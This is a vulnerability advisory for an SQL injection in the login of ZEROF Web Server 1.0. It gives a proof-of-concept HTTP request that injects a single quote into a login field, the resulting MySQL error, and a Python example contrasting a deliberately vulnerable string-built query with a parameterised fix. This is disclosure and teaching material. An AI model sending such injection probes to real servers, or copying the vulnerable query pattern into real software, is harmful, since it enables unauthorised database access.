
CVE-2021-30175

Description

ZEROF Web Server 1.0 (April 2021 version) allows SQL Injection on login page.

Additional Information

Parameters received by the web application must be sanitized and filtered to prevent the execution of control constructs (here, a single quote in a login field is passed straight into the SQL statement).

Vulnerability Type

SQL Injection

Vendor of Product

Zerof

Affected Product Code Base

ZEROF Web Server - 1.0 (April 2021)

Affected Component

Attack Type

Remote

Impact: Code Execution

true

Impact: Information Disclosure

true

Discoverer

  • Anna Sidorova
  • AWILLIX LLC

Attack Vectors

Example (request):

POST /HandleEvent HTTP/1.1
Host: zerof
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126

Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O

Response:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 07 Apr 2021 10:33:44 GMT
Server: ZEROF Web Server

try{_rsov_(O33,0);_rsov_(O37,0);}finally{alert("#42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1.");}
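The defect behind the response above, and its fix, as an added illustration that is not ZEROF's code: the login values (O33 and O37 in the request) are spliced into the SQL text, so the single quote sent as O33 produces a syntax error that the server then echoes to the client. The table, column names and the SQLite backend are constructed stand-ins (the real server reports MySQL); the fixed version binds the values as parameters and returns a generic message instead of the database error.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the login table; not the product's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, login, password):
    # The defect: form values are formatted into the statement text, so a quote
    # in the input becomes part of the SQL grammar rather than data.
    sql = ("SELECT login FROM users WHERE login = '%s' AND password = '%s'"
           % (login, password))
    return conn.execute(sql).fetchone()


def sql_error_for(conn, login, password):
    # Mirrors what the advisory shows: the raw database error text reaches the
    # client. Returns the message, or None if the query parsed.
    try:
        login_vulnerable(conn, login, password)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def login_fixed(conn, login, password):
    # Parameter binding: values travel separately from the statement text, so
    # no input character can change the query structure.
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone()


def handle_login(conn, login, password):
    # Server-side wrapper: a database failure yields a generic message; the
    # engine's error text never goes back to the browser.
    try:
        row = login_fixed(conn, login, password)
    except sqlite3.Error:
        return {"ok": False, "msg": "Login failed"}
    return {"ok": row is not None, "msg": "Welcome" if row else "Login failed"}
```

Feeding the advisory's values (login `'`, password `fff`) to `login_vulnerable` raises a syntax error, while `login_fixed` simply finds no matching row.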

Reference